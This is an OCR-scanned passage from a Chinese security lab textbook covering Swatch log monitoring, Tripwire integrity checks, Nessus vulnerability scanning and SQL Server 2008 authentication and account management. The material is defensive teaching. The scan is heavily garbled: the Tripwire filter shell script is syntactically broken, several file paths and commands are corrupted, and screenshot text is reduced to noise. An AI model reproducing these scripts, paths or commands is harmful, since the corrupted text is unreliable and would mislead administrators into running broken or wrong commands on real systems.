建议 从 Swatch 的 官方 网 站 获得 可 靠 的 Swatch 软件 包 ， 下 载 网 址 : http://sourceforge.net 
/projects/swatch/。 下 载 后 解压 ， 进 入 到 解压 后 的 目录 ， 执 行 如 下 命令 : 


#perl Makefile.PL 
#make 

#make test 

#make install 
#make realclean 


Swatch 程序 安装 成 功 后 , Perl 模块 将 会 用 于 Swatch 程序 的 运行 。 

配置 : Swatch 程序 使 用 正则 表达 式 (Regular Expressions) 来 发 现 感 兴趣 的 目标 行 。 
一 旦 Swatch 发 现 某 一 行 匹配 预 设 定 的 模式 ， 它 会 立即 采取 行动 ， 比 如 屏幕 打印 、 发 送 电 
子 邮件 ， 或 者 采取 用 户 预先 设 定 的 行动 ， 比 如 : 

watchfor /[fF]ailed|/FRAIL.*ED/ 

echo bold 


bell 3 
mail 


上 面 的 脚本 是 Swatch 配置 文件 一 个 部 分 的 例子 。 首 先 ，Swatch 在 指定 的 日 志文 件 
中 寻找 包含 设 定单 词 failed、Failed， 或 者 其 他 以 FAIL 开始 或 者 以 ED 结束 的 单词 的 行 ， 
一 旦 搜索 到 某 行 包含 三 个 搜索 单词 中 的 任何 一 个 ，Swatch 程序 立即 向 终端 显示 粗 体 行 和 
响 铃 三 下 ， 然 后 发 送 电子 邮件 给 运行 Swatch 程序 的 用 户 (通常 是 root 用 户 )。 
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使 用 Swatch 运行 : swatch --config-file=/etc/swatch.conf --examine=/var/log/messages。 
上 面 的 例子 中 配置 文件 所 在 的 系统 绝对 路 径 是 /etcswatch.conf 需要 检查 的 日 志文 
件 是 /varlog/messages。 使 用 Swatch 检查 不 断 增加 的 日 志文 件 : 


Swatch --config-file=/home/zhaoke/swatch.conf --tail-file=/var/log/messages 


【实验 报告 】 
叙述 Linux 操作 系统 中 日 志 审 计 的 各 种 操作 。 
【思考 题 】 


(1) 查找 资料 ， 分 析 日 志 审 计 操 作 的 重要 性 。 
(2) 配置 Swatch， 使 之 能 够 检测 登录 失败 事件 ， 并 测试 。 


9.4.2 文件 完整 性 保护 


【实验 目的 】 
掌握 利用 开源 完整 性 检测 工具 Tripwire 来 检查 系统 完整 性 的 方法 。 


【原理 简介 】 

系统 的 正常 运行 要 靠 系 统 程序 的 正常 运转 ， 而 程序 的 运行 又 与 其 可 执行 文件 休 威 相 
关 。 所 以 ， 维 护 系统 完整 性 是 确保 系统 安全 的 一 项 基本 工作 。 系 统 完整 性 是 指 系统 中 可 
执行 文件 的 完整 性 ， 也 就 是 说 系统 中 的 程序 文件 没有 被 非法 修改 。 

如 果 可 执行 文件 被 恶意 修改 ,如 改变 、 插 入 或 删除 等 ， 将 直接 威胁 到 系统 的 安全 性 。 
大 多 数 情况 下 ， 黑 客 渗入 到 系统 后 会 立即 修改 某 些 系统 文件 以 创建 后 门 ， 如 用 准备 好 的 
替代 物 换 掉 系 统 中 原 有 的 /bin/login 文件 以 便 使 其 不 用 口令 便 能 登录 系统 ;然后 再 修改 某 
些 文件 ， 例 如 /bim/ls 等 ， 以 便 隐藏 其 行径 。 因 此 需要 一 种 文件 完整 性 检查 工具 ， 使 得 当 
系统 文件 被 恶意 修改 后 能 及 时 发 现 ， 从 而 为 进一步 处 理 创造 条 件 。 

Tripwire 是 一 款 最 为 常用 的 开放 源码 的 完整 性 检查 工具 ， 它 生成 目标 文件 的 校 验 和 
并 周期 性 地 检查 文件 是 否 被 更 改 。 对 于 需要 监视 的 文件 ，Tripwire 会 使 用 校 验 和 来 为 文 
件 的 某 个 状态 生成 唯一 的 标识 (又 称 为 “快照 ”)， 并 将 其 存放 起 来 以 备 后 用 。 当 Tripwire 
程序 运行 时 ， 它 先 计算 新 的 标识 ， 并 与 存放 的 原 标识 加 以 比较 ， 如 果 发 现 不 匹配 ， 它 就 
报告 系统 管理 人 员 文 件 已 经 被 修改 。 接 下 来 ， 系 统管 理 员 就 可 以 利用 这 个 不 匹配 来 判断 
系统 是 否 唱 到 了 入 侵 。 


【实验 环境 】 
Linux 操作 系统 ，Tripwire。 


【实验 步骤 】 
(1)RPM 档 安装 后 (为 pm -ivh tripwire-xxxrpm), 需要 再 执行 /etc/tripwire/twinstall.sh。 


#/etc/tripwire/twinstall.sh 
(2) 数据 库 初 始 化 模式 。 


#/usr/sbin/tripwire -m i 
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(3) 修改 原则 文件 以 符合 系统 现 有 的 文件 结构 。 


#cd /etc/tripwire 
#/usr/sbin/tripwire -m c | grep Filename > twnotfound.txt 


编写 一 个 shell script (twfilter.sh): 


#!/bin/bash 

org_ file=/etc/tripwire/twpol.txt 

not_ file=twnotfound.txt 

tmp_file=tmp.txt 

new_file=new.txt 

cat S$org file > $tmp file 

for 4 in §{ cat Snot file | cut =d "s" =£ 2 )3 do 
grep -v $i S$tmp file > $new file 
cat S$new file > $tmp file 

done 


mv S$org file $org file.bak 
cat $new file > $org file 
rm -f $new file 

rm -f $tmp file 

# ---END Script---# 


#sh twfilter.sh 


产生 符合 系统 的 原则 文件 。 
(4) 根据 新 的 原则 文件 重建 数据 库 。 


#/usr/sbin/twadmin -m P /etc/tripwire/twpol.txt 
#/usr/sbin/tripwire -m i 


(5) 建立 数据 库 后 “务必 ”删除 纯 文字 格式 的 原则 文件 和 设 定 档 。 


#rm /etc/tripwire/twpol.txt 
#rm /etc/tripwire/twcfg.txt 


(6) 完整 性 检查 模式 。 
#/usr/sbin/tripwire -m c 
可 在 /etc/cron.daily/ 下 新 增 script (tw-check): 


#!/bin/bash 

/usr/sbin/tripwire -mc | mail -s "Tripwire Daily Report from " root@localhost 
(7) 数据 库 更 新 模式 。 

如 果 系 统 有 新 增 或 修改 档案 ， 需 更 新 数据 库 : 
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#/usr/sbin/tripwire -m u -r /var/lib/tripwire/report/-.twr 


进入 vi 编辑 模式 ， 在 报告 文件 中 有 违反 原则 的 会 有 一 个 选择 框 ([X])， 若 维持 "X" 
表示 接受 此 变动 ， 如 果 移 除 "X" 则 表示 不 更 新 此 变化 (未 来 再 检查 还 是 会 列 出 来 )， 改 完 
存盘 时 需 输入 local key 密码 ，Tripwire 会 更 新 数据 库 并 存盘 。 

(8) 策略 更 新 模式 。 

将 现 有 的 原则 档 〈 加 密 版 ) 导出 为 twpoltxt〈 纯 文字 版 )。 


#/usr/sbin/twadmin -m p > /etc/tripwire/twpol.txt , 改 完 再 更 新 回 加 密 版 
#/usr/sbin/tripwire -m p /etc/tripwire/twpol.txt 


#/usr/sbin/tripwire -m c 


立即 做 检查 ， 并 记得 删除 twpol.txt。 
(9) 如 果 要 更 新 设 定 档 ， 需 先导 出 现 有 的 设 定 档 (加 密 版 ) 为 纯 文字 格式 。 
#/usr/sbin/twadmin -m f > /etc/tripwire/twcfg.txt, 改 完 再 更 新 回 加 密 版 


#/usr/sbin/twadmin -m F --site-keyfile /etc/tripwire/site.key twcfg.txt 
#rm twcfg.txt 


监控 文件 名 单 包含 在 /etc/tripwire/twpol.txt 中 。 


【实验 报告 】 
(1) 叙述 Tripwire 的 使 用 方法 。 
(2) 测试 Tripwire 检测 完整 性 的 效果 。 


【思考 题 】 
分 析 使 用 Tripwire 后 对 系统 安全 的 影响 ， 能 够 阻止 或 发 现 哪些 攻击 ? 对 哪些 攻击 不 
起 作用 ? Tripwire 的 缺点 有 哪些 ? 


9.4.3 ”系统 风险 评估 


【实验 目的 】 
掌握 Linux 环境 下 风险 分 析 的 方法 ， 熟 练 使 用 常用 的 安全 扫描 工具 。 


【原理 简介 】 

漏洞 扫描 就 是 对 重要 计算 机 信息 系统 进行 检查 ， 发 现 其 中 可 被 黑客 利用 的 漏洞 。 漏 
洞 扫描 的 结果 实际 上 就 是 系统 安全 性 能 的 一 个 评估 ， 它 指出 了 哪些 攻击 是 可 能 的 ， 因 此 
成 为 安全 方案 的 一 个 重要 组 成 部 分 。Nessus 是 一 款 非常 流行 的 风险 评估 软件 ， 可 以 帮助 
评估 临界 系统 和 应 用 程序 的 漏洞 。 它 针对 以 下 平台 提供 安装 包 和 客户 端 : 

® Linux: Fedora FC4、 5,Red Hat Enterprise 3、4.,SuSE 9.3、10, Debian 3.1 (i386) 
FreeBSD: FreeBSD 5、6 (1386) 
Solaris: Solaris 9、10 (Sparc) 
Mac OS X: Mac OS X 10.4 (Intel、PPC) 
Windows: Windows 2000, XP 2003 (32b) 
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Nessus 根据 已 知 的 系统 漏洞 和 弱点 ， 对 被 评估 的 系统 进行 模拟 攻击 ， 最 后 给 出 一 份 
详细 的 报告 。Nessus 将 系统 的 漏洞 归结 为 以 下 三 类 。 

(1) Security Holes: 该 项 攻击 成 功 并 且 会 造成 极 大 的 安全 风险 。 

(2) Security Warmings: 该 项 攻击 成 功 ， 但 是 不 会 对 安全 造成 大 的 影响 。 

(3) Security Notes: 软件 通过 扫描 发 现 了 系统 相关 信息 。 

接 下 来 ，Nessus 还 会 将 这 三 类 漏洞 依据 风险 因素 分 解 为 不 同等 级 。 

(1) Critical: 已 经 威胁 到 远 端 主机 的 安全 。 

(2) Serious: 该 漏洞 泄露 的 信息 可 以 被 黑客 利用 进行 攻击 。 

(3) High: 黑客 可 以 在 远 端 主机 获取 Shell， 或 者 执行 任意 命令 。 

(4) Medium: 该 安全 漏洞 可 以 导致 用 户 权限 扩大 。 

(5) Low: 从 该 漏洞 获取 的 信息 可 以 被 黑客 利用 ， 但 是 不 会 立刻 造成 严重 威胁 。 

(6) None: 系统 不 存在 隐患 。 

对 于 每 个 被 发 现 的 漏洞 ，Nessus 都 会 有 一 个 BugTraq ID (BID) 列表 链接 ， 一 个 公 
共 漏 洞 和 暴露 (CVE) 代码 链接 和 一 个 Nessus ID 。 这 三 个 参考 链接 中 的 任意 一 个 ， 都 可 
以 帮助 用 户 更 进一步 了 解 该 漏洞 的 潜在 危害 。 

通过 分 析 Nessus 的 评估 报告 来 判断 系统 漏洞 是 否 会 对 系统 造成 影响 , 可 以 通过 打 补 
丁 或 者 升级 软件 的 方式 来 解决 风险 问题 。 

【实验 环境 】 

Linux 操作 系统 ，Nessus 软件 。 


【实验 步骤 】 

(1) 安装 Nessus 软件 ， 从 www.nessus.org 网 站 下 载 最 新 的 系统 ，Linux 平台 包括 服 
务 器 和 客户 端 两 个 部 分 ， 都 是 RPM 包 ， 安 装 很 简单 。 

(2) 服务 器 安装 的 默认 目录 在 /opt/nessus/ 下 面 ， 客 户 端 安装 后 的 目录 在 /usr/X11R6/ 
bin/ 下 面 。 

(3) 服务 端 配置 : 首先 运行 /optnessus/sbin/mnessus-add-firstuser， 添 加 一 个 用 户 才 能 
启动 nessus 服务 进程 。 过 程 如 下 : 


[root@mylivx ~]# cd /opt/nessus/sbin 

[root@mylivx sbin]# 1s 

nessus-add-first-user nessus-chpasswd nessus-rmuser 
nessus-adduser nessusd nessus-update-plugins 
nessus-check-signature nessus-mkcert 

[root@mylivx sbin]# ./nessus-add-first-user 


Using /var/tmp as a temporary file holder 


Add a new nessusd user 
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Login : testhost 

Authentication (pass/cert) [pass] : pass 
Login password : 

Login password (again) : 


User rules 

nessusd has a rules system which allows you to restrict the hosts 
that testhost has the right to test. For instance, you may want 
him to be able to scan his own host only. 


Please see the nessus-adduser (8) man page for the rules syntax 
Enter the rules for this user, and hit ctrl-D once you are done : 


(the user can have an empty rules set) 
default accept 


Login : testhost 
Password 各 认 实 尖 兴 闪 由 光 兴 闪 次 
DN 3 

Rules : 


default accept 


Is that ok ? (y/n) [y] y 

user added. 

Thank you. You can now start Nessus by typing : 
/opt/nessus/sbin/nessusd -D 


[root@mylivx sbin]# /opt/nessus/sbin/nessusd -D 


(4) 客户 端 配置 ， 以 root 身份 登录 系统 ， 输 入 命令 : /usr/X11R6/bin/NessusClient， 
启动 客户 端 ， 如 图 9-9 所 示 。 


Global Sertings 


myscan 
unnamed task 


Number of checks to perfomm a 
Path to the CGls: 


图 9-9 Nessus 客户 端 


单 击 FilelScan Assistant 菜单 项 ， 出 现 界面 如 图 9-10 所 示 , 通过 向 导 来 生成 一 个 扫描 
任务 ， 在 Stepl 选项 卡 中 输入 任务 名 称 “scan webserver”， 在 Step3 选项 卡 中 输入 目标 ， 
可 以 是 机 器 名 称 或 卫 地址， 在 Step4 中 单 击 Execute， 出 现 界面 如 图 9-11 所 示 ， 设 置 扫 
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描 服务 器 。 


project 
‘You should also enter a comment futher explaining the task. 


Please enter a name for your task: 
scan webservel| 


Comment: 


Jopt/nessus/com/nessus/CA/cacert.pem 
User Certificate File: 
/optinessus/liups/cerl_nessuswx_jiups.pem 


User Key File: 
| /opt/nessus/liups/Vey_liups. pem 


[pa | [Mcaes [Kewa | [ Por | 
图 9-10 ”扫描 助手 图 9-11 扫描 服务 器 设置 


(5) 在 连接 扫描 服务 器 的 设置 界面 中 ， 用 户 需要 设置 扫描 服务 器 的 地 址 、 端 口 、 用 
户 名 和 口令 。 单 击 OK 客户 端 就 会 连接 扫描 服务 器 ， 连 接 成 功 后 就 开始 扫描 。 
(6) 扫描 结束 后 ， 系 统 会 给 出 被 扫描 主机 的 风险 分 析 结 果 ， 如 图 9-12 所 示 。 


[Repor for scope: Posts of project aa Task myscan) 
i 
? telnet (23/tcp) 9 Securty Note 


? sunrpc (11l/vdp) 
8 upe ODN 了 


上 The remote host is missing the patch for the advisory FEDORA-2 


Host $ | The Dia drawing program is designed to be like the Windows(TM) 

ram. Dia can be used to draw different types of diagrams, an| 

cludes support for UML static structure diagrams (class diagram| 

ity relationship modeling, and network diagrams. Dia can load 

ave diagrams to a custom file format, can load and save in -xml 
nd can export to PostScript(TM). 


pdate Information: 


ixes CVE-2006-1550 Dia multiple buffer overflows 


Scantook place from Thu Aug 31 18.47:38 2006 to Thu Aug 31 18:50:38 2006 
图 9-12 扫描 分 析 结 果 

(7) 查看 扫描 结果 ， 修 补 系统 漏洞 。 

【实验 报告 】 

(1) 安装 最 新 版 本 的 Nessus 扫描 系统 ， 并 进行 配置 。 

(2) 对 一 个 主机 进行 安全 扫描 ， 并 分 析 扫 描 结果 ， 根 据 结果 进行 系统 安全 加 强 。 

【思考 题 】 

分 析 Nessus 扫描 软件 的 扫描 原理 是 什么 及 其 在 系统 安全 中 的 作用 。 
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数据 库 是 信息 管理 系统 、 电 子 商务 、 电 子 政务 的 基础 ， 保 存 着 重要 的 数据 和 信息 ， 
例如 生产 数据 、 交 易 记 录 、 工 程 数 据 、 个 人 资料 等 。 数 据 完整 性 和 合法 存 取 会 受到 很 多 
方面 的 安全 威胁 ， 包 括 密码 策略 、 系 统 后 门 、 数 据 库 操作 以 及 本 身 的 安全 方案 。 数 据 库 
的 安全 性 是 指 保护 数据 库 以 防止 不 合法 的 使 用 所 造成 的 数据 汇 露 、 更 改 或 破坏 。 本 章 围 
绕 数据 库 的 安全 性 配置 、 数 据 库 的 架构 设计 以 及 对 数据 的 备份 与 恢复 操作 等 方面 的 内 容 ， 
展开 详细 讲解 。 


fi SQL Server 服务 器 的 安全 配置 


SQL Server 2008 是 微软 公司 推出 的 一 个 数据 库 产品 ,集成 了 许多 新 的 功能 特性 和 关 
键 的 改进 , 使 得 它 成 为 至 今 为 止 最 强大 和 最 全 面 的 SQL Server 版 本 。 SQL Server 2008 提 
供 了 丰富 的 安全 特性 ， 用 于 保护 数据 和 网 络 资源 。 它 的 安装 更 轻松 、 更 安全 ， 除 了 最 基 
本 的 特性 之 外 ， 其 他 特性 都 不 是 默认 安装 的 ， 即 便 安装 了 也 处 于 未 启用 的 状态 。SQL 
Server 提供 了 丰富 的 服务 器 配置 工具 ， 它 的 身份 验证 特性 得 到 了 增强 ，SQL Server 更 加 
紧密 地 与 Windows 身份 验证 相 集成 ， 并 保护 弱 口 令 或 陈旧 的 口令 。 有 了 细 粒 度 授 权 、 
SQL Server Agent 代理 和 执行 上 下 文 ， 在 经 过 验证 之 后 ， 授 权 和 控制 用 户 可 以 采取 的 操 
作 将 更 加 灵活 。 元 数据 也 更 加 安全 ， 因 为 系统 元 数据 视图 仅 返回 关于 用 户 有 权 以 某 种 形 
式 使 用 的 对 象 的 信息 。 在 数据 库 级 别 ， 加 密 提 供 了 最 后 一 道 安全 防线 ， 而 用 户 与 架构 的 
分 离 使 得 用 户 的 管理 更 加 轻松 。 

SQL Server 的 安全 机 制 一 般 主 要 包括 以 下 三 个 等 级 。 

1. 服务 器 级 别 的 安全 机 制 

这 个 级 别 的 安全 性 主要 通过 登录 账户 进行 控制 ， 要 想 访 问 一 个 数据 库 服务 器 ， 必 须 
拥有 一 个 登录 账户 。 登 录 账 户 可 以 是 Windows 账户 或 组 , 也 可 以 是 SQL Server 的 登录 账 
户 。 登 录 账 户 可 以 属于 相应 的 服务 器 角色 。 至 于 角色 ， 可 以 理解 为 权限 的 组 合 。 

2. 数据 库 级 别 的 安全 机 制 

这 个 级 别 的 安全 性 主要 通过 用 户 账户 进行 控制 ， 要 想 访 问 一 个 数据 库 ， 必 须 拥 有 该 
数据 库 的 一 个 用 户 账户 身份 。 用 户 账户 是 通过 登录 账户 进行 映射 的 ， 可 以 属于 固定 的 数 
据 库 角色 或 自 定义 数据 库 角色 。 

3. 数据 对 象 级 别 的 安全 机 制 

这 个 级 别 的 安全 性 通过 设置 数据 对 象 的 访问 权限 进行 控制 。 


SQL Server 2008 中 广泛 使 用 安全 主体 和 安全 对 象 管理 安全 。 一 个 请 求 服务 器 、 数 据 
库 或 架构 资源 的 实体 称 为 安全 主体 。 每 一 个 安全 主体 都 有 唯一 的 安全 标识 符 (Secrity 
Identifier，ID)。 安 全 主体 在 三 个 级 别 上 管理 : Windows、SQL Server 和 数据 库 。 安 全 主 
体 的 级 别 决定 了 安全 主体 的 影响 范围 。 通 常 ，Windows 和 SQL Server 级 别 的 安全 主体 具 
有 实例 级 的 范围 ， 而 数据 库 级 别 的 安全 主体 的 影响 范围 是 特定 的 数据 库 。 

安全 主体 能 在 分 等 级 的 实体 集合 (也 称 为 安全 对 象 ) 上 分 配 特 定 的 权限 。 最 顶层 的 
三 个 安全 对 象 是 服务 器 、 数据库 和 架构 。 这 些 安全 对 象 的 每 一 个 都 包含 其 他 的 安全 对 和 象 ， 
后 者 依次 又 包含 其 他 的 安全 对 象 ， 这 些 嵌 套 的 层次 结构 称 为 范围 。 因 此 ， 也 可 以 说 SQL 
Server 中 的 安全 对 象 范围 是 服务 器 、 数 据 库 和 架构 。 


10.1.1 身份 验证 模式 配置 


【实验 目的 】 
掌握 SQL Server 2008 数据 库 服务 器 的 身份 验证 模式 配置 。 


【原理 简介 】 

SQL Server 2008 提供 了 Windows 身份 和 混合 身份 两 种 验证 模式 。 

1. Windows 身份 验证 

Windows 身份 验证 模式 是 默认 的 身份 验证 模式 ， 它 比 混合 模式 要 安全 得 多 。 当 用 户 
通过 Windows 用 户 账户 连接 时 ，SQL Server 使 用 操作 系统 中 的 Windows 主体 标记 验证 
账户 名 和 密码 。 也 就 是 说 , 用 户 身份 由 Windows 进行 确认 。SQL Server 不 要 求 提供 密码 ， 
也 不 执行 身份 验证 。 通 过 Windows 身份 验证 完成 的 连接 有 时 也 称 为 可 信和 连接 ， 这 是 因为 
SQL Server 信任 由 Windows 提供 的 凭据 。 

Windows 身份 验证 模式 有 以 下 主要 优点 。 

e 数据 库 管 理 员 的 工作 可 以 集中 在 管理 数据 库 上 面 ， 而 不 是 管理 用 户 账户 。 对 用 户 

账户 的 管理 可 以 交 给 Windows 去 完成 。 

e Windows 有 更 强 的 用 户 账户 管理 工具 。 可 以 设置 账户 锁定 、 密 码 期 限 等 。 如 果 不 

通过 定制 来 扩展 SQL Server，SQL Server 则 不 具备 这 些 功能 。 

e Windows 的 组 策略 支持 多 个 用 户 同时 被 授权 访问 SQL Server。 

2. 混合 模式 

使 用 混合 安全 的 身份 验证 模式 , 可 以 同时 使 用 Windows 身份 验证 和 SQL Server 登录。 
SQL Server 登录 主要 用 于 外 部 的 用 户 , 例如 那些 可 能 从 Internet 访问 数据 库 的 用 户 。 可 以 
配置 从 Internet 访问 SQL Server 2008 的 应 用 程序 以 自动 地 使 用 指定 的 账户 或 提示 用 户 输 
入 有 效 的 SQL Server 用 户 账户 和 密码 。 

使 用 混合 安全 模式 ，SQL Server 2008 首先 确定 用 户 的 连接 是 否 使 用 有 效 的 SQL 
Server 用 户 账户 登录 。 仅 当 用 户 没有 有 效 的 登录 时 ，SQL Server 2008 才 检 查 Windows 账 
户 的 信息 。 在 这 种 情况 下 ，SQL Server 2008 将 会 确定 Windows 账户 是 否 有 连接 到 服务 器 
的 权限 。 如 果 账 户 有 权限 ， 连 接 被 接受 ; 否则 ， 连 接 被 拒绝 。 
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当 使 用 混合 模式 身份 验证 时 , 在 SQL Server 中 创建 的 登录 名 并 不 基于 Windows 用 户 
账户 。 用 户 名 和 密码 均 通 过 使 用 SQL Server 创建 并 存储 在 SQL Server 中 。 通 过 混合 模式 
身份 验证 进行 连接 的 用 户 每 次 连接 时 必须 提供 其 凭据 (登录 名 和 密码 )。 当 使 用 混合 模式 
身份 验证 时 ， 必 须 为 所 有 SQL Server 账户 设置 强 密码 。 
如 果 用 户 是 具有 Windows 登录 名 和 密码 的 Windows 域 用 户 ， 则 还 必须 提供 另 一 
个 用 于 连接 的 (SQL Server) 登录 名 和 密码 。 记 住 多 个 登录 名 和 密码 对 于 许多 用 户 而 言 
都 较为 困难 。 每 次 连接 到 数据 库 时 都 必须 提供 SQL Server 和 凭据 也 十 分 烦琐 。 混 合 模式 
身份 验证 的 缺点 如 下 所 示 。 
e@ SQL Server 身份 验证 无 法 使 用 Kerberos 安全 协议 。 
e@ SQL Server 登录 名 不 能 使 用 Windows 提供 的 其 他 密码 策略 。 
混合 模式 身份 验证 的 优点 如 下 。 
e@ 人 允许 SQL Server 支持 那些 需要 进行 SQL Server 身份 验证 的 旧版 应 用 程序 和 由 第 
三 方 提供 的 应 用 程序 。 

e 人 允许 SQL Server 支持 具有 混合 操作 系统 的 环境 ， 在 这 种 环境 中 并 不 是 所 有 用 户 
均 由 Windows 域 进行 验证 。 

e 人 允许 用 户 从 未 知 的 或 不 可 信 的 域 进行 连接 。 例 如 ， 既 定 客户 使 用 指定 的 SQL 
Server 登录 名 进行 连接 以 接收 其 订单 状态 的 应 用 程序 。 

e 人 允许 SQL Server 支持 基于 Web 的 应 用 程序 ， 在 这 些 应 用 程序 中 用 户 可 创建 自己 
的 标识 。 

e 允许 软件 开发 人 员 通 过 使 用 基于 已 知 的 预 设 SQL Server 登录 名 的 复杂 权限 层次 

结构 来 分 发 应 用 程序 。 


【实验 环境 】 
SQL Server 2005 以 上 数据 库 系 统 。 


【实验 步骤 】 

在 第 一 次 安装 SQL Server 2008 或 者 使 用 SQL Server 2008 连接 其 他 服务 器 的 时 候 ， 
需要 指定 验证 模式 。 对 于 已 指定 验证 模式 的 SQL Server 2008 服务 器 还 可 以 进行 修改 , 具 
体操 作 步 又 如 下 。 

(1) 打开 SQL Server Management Studio， 选 择 一 种 身份 验证 模式 建立 与 服务 器 的 连 
接 ， 如 图 10-1 所 示 。 

(2) 在 【对 象 资源 管理 器 】 窗 口中 右 击 当前 服务 器 名 称 ， 选 择 【 属 性 】 命 令 ， 打 开 
【服务 器 属性 】 窗 口 ， 在 左 侧 的 选项 卡 列表 框 中 ， 选 择 【 安 全 性 】 选 项 卡 ， 展 开 安 全 性 选 
项 内 容 ， 如 图 10-2 所 示 。 在 此 选项 卡 中 即 可 设置 身份 验证 模式 ， 登 录 审核 选项 。 

【实验 报告 】 

尝试 为 数据 系统 身份 验证 模式 分 别 设置 为 Windows 身份 认证 和 混合 认证 模式 , 并 比 
较 二 者 的 异同 。 
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贺 记 住 密码 


图 10-1 SQL Server Management Studio 登录 


服务 器 身份 验证 
日 Windows 身份 验证 模式 中 ) 
图 SQL Server 和 Windows 身份 验证 模式 G) 


图 10-2 更 改 身份 验证 模式 


【思考 题 】 
作为 Web 服务 器 的 数据 库 时 应 该 采用 哪 种 身份 认证 模式 ? 
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10.1.2 ”管理 用 户 账号 


【实验 目的 】 
掌握 SQL Server 2008 数据 库 服务 器 的 用 户 管理 。 


【原理 简介 】 

服务 器 登录 账号 分 为 两 类 : 使 用 Windows 账号 登录 ，Windows 账号 是 域 或 本 地 用 户 
账号 、 本 地 组 账户 或 通用 的 和 全 局 的 域 组 账户 ; 通过 指定 唯一 的 登录 ID 和 密码 来 创建 
SQL Server 账号 登录 ， 默 认 登 录 包 括 本 地 管理 员 组 、 本 地 管理 员 、sa、Network Service 
和 SYSTEM。 

e 系统 管理 员 组 。SQL Server 中 管理 员 组 在 数据 库 服 务 器 上 属于 本 地 组 。 这 个 组 

的 成 员 通常 包括 本 地 管理 员 用 户 账户 和 任何 设置 为 管理 员 本 地 系统 的 其 他 用 户 。 
在 SQL Server 中 ， 此 组 默认 授予 sysadmin 服务 器 角色 。 

e 管理 员 用 户 账户 。 管 理 员 是 在 SQL Server 服务 器 上 的 本 地 用 户 账户 。 该 账户 提 
供 对 本 地 系统 的 管理 权限 ， 主 要 在 安装 系统 时 使 用 它 。 如 果 计 算 机 是 Windows 
域 的 一 部 分 ， 管 理 员 账 户 通常 也 有 域 范围 的 权限 。 在 SQL Server 中 ， 这 个 账户 
默认 授予 sysadmin 服务 器 角色 。 

e@ Sa 登录。 是 SQL Server 系统 管理 员 的 账户 。 而 在 SQL Server 中 采用 了 新 的 集成 

和 扩展 的 安全 模式 , sa 不 再 是 必需 的 , 提供 此 登录 账户 主要 是 为 了 针对 以 前 SQL 
Server 版 本 的 向 后 兼容 性 。 与 其 他 管理 员 登 录 一 样 ，sa 默认 授予 sysadmin 服务 
器 角色 。 在 默认 安装 SQL Server 的 时 候 ，sa 账户 没有 被 指派 密码 。 

@ Network Service 和 SYSTEM 登录 。 它 是 SQL Server 服务 器 上 内 置 的 本 地 账户 ， 
而 是 否 创 建 这 些 账户 的 服务 器 登录 ， 依 赖 于 服务 器 的 配置 。 例 如 ， 如 果 已 经 将 服 
务 器 配置 为 报表 服务 器 ， 此 时 将 有 一 个 NETWORK SERVICE 的 登录 账户 ， 这 个 
登录 将 是 mester、msdb、ReportServer 和 ReportServerTempDB 数据 库 的 特殊 数据 
库 角 色 RSExceRole 的 成 员 。 

在 服务 器 实例 设置 期 间 ，NETWORK SERVICE 和 SYSTEM 账户 可 以 是 为 SQL 
Server、SQL Server 代理 、 分 析 服 务 和 报表 服务 器 所 选择 的 服务 账户 。 在 这 种 情况 下 ， 
SYSTEM 账户 通常 具有 sysadmin 服务 器 和 角色 ， 人 允许 其 完全 访问 以 管理 服务 器 实例 。 

要 访问 特定 的 数据 库 ， 还 必须 具有 用 户 名 。 用 户 名 在 特定 的 数据 库 内 创建 ， 并 关联 
一 个 登录 名 《〈 当 一 个 用 户 创建 时 ， 必 须 关联 一 个 登录 名 )。 通 过 授权 给 用 户 来 指定 用 户 可 
以 访问 的 数据 库 对 象 的 权限 。 一 般 情况 下 ， 用 户 登 录 SQL Server 实例 后 ， 还 不 具备 访问 
数据 库 的 条 件 。 在 用 户 可 以 访问 数据 库 之 前 ， 管 理 员 必须 为 该 用 户 在 数据 库 中 建立 一 个 
数据 库 账 号 作为 访问 该 数据 库 的 ID 。 这 个 过 程 就 是 将 SQL Server 登录 账号 映射 到 需要 
访问 的 每 个 数据 库 中 ， 这 样 才能 够 访问 数据 库 。 如 果 数 据 库 中 没有 用 户 账户 ， 则 即使 用 
户 能 够 连接 到 SQL Server 实例 也 无 法 访问 到 该 数据 库 。 


【实验 环境 】 
SQL Server 2005 以 上 数据 库 系统 。 


161 


【实验 步骤 】 

(1) 打开 Microsoft SQL Server Management Studio， 展 开 【 服 务 器 】 节 点 ， 然 后 展开 
【安全 性 】 节 点 。 

(2) 右 击 【登录 名 】 节 点 ， 从 弹出 的 菜单 中 选择 【新 建 登 录 名 】 命 令 ， 将 打开 【 登 
录 名 -新 建 】 窗 口 ， 然 后 输入 登录 名 为 test_ Manage， 同 时 ， 选 择 【SQL Server 身份 验证 】 
单 选 按钮 ， 并 设置 密码 ， 如 图 10-3 所 示 。 


图 10-3 ”创建 SQL Server 登录 账户 

(3) 单 击 【确定 】 按 钮 ， 完 成 SQL Server 登录 账户 的 创建 。 

为 了 测试 创建 的 登录 名 是 否 成 功 ， 下 面 用 新 的 登录 名 test_Manage 来 进行 测试 ， 具 
体 步骤 如 下 所 示 。 

(1) 在 SQL Server Management Studio 中 ， 单 击 【 连 接 】|【 数 据 库 引 擎 】 命 令 ， 将 
打开 【连接 到 服务 器 】 对 话 框 。 

(2) 从 【身份 验证 】 下 拉 表 中 ， 选 择 【SQL Server 身份 验证 】 选 项 ,【 登录 名 】 文 本 
框 中 输入 “test_Manage”, 【密码 】 文 本 框 中 输入 相应 的 密码 ， 如 图 10-4 所 示 。 

(3) 单 击 【 连 接 】 按 钮 ， 登 录 服务 器 ， 如 图 10-5 所 示 。 

但 是 由 于 默认 的 数据 库 是 master 数据 库 ， 所 有 其 他 的 数据 库 没有 权限 访问 。 这 里 访 
问 taobao 数据 库 ， 就 会 提示 错误 信息 。 


162 


ee 第 10 章 常用 数据 库 系统 安全 mm 


图 10-4 连接 服务 器 


SQL server Management Studio EE 
| x#® B 昌 

帮助 (H) 

前 0Y | 语 | 访 | 区 加 委 | 敬 昌 


10-5 ”使 用 test_Manage 登录 成 功 


下 面 通过 使 用 SQL Server Management Studio 来 创建 数据 库 用 户 账户 , 然后 给 用 户 授 
予 访问 数据 库 taobao 的 权限 。 有 具体 步骤 如 下 所 示 。 

(1) 以 sa 用 户 登 录 SQL Server Management Studio， 并 展开 【服务 器 】 节 点 。 展 开 
【数据 库 】 节 点 ， 然 后 再 展开 taobao 节点 。 

(2) 再 展开 【安全 性 】 节 点 ， 右 击 【 用 户 】 节 点 ， 从 弹出 菜单 中 选择 【新 建 用 户 】 
命令 ， 打 开 【 数 据 库 用 户 -新 建 】 窗 口 。 

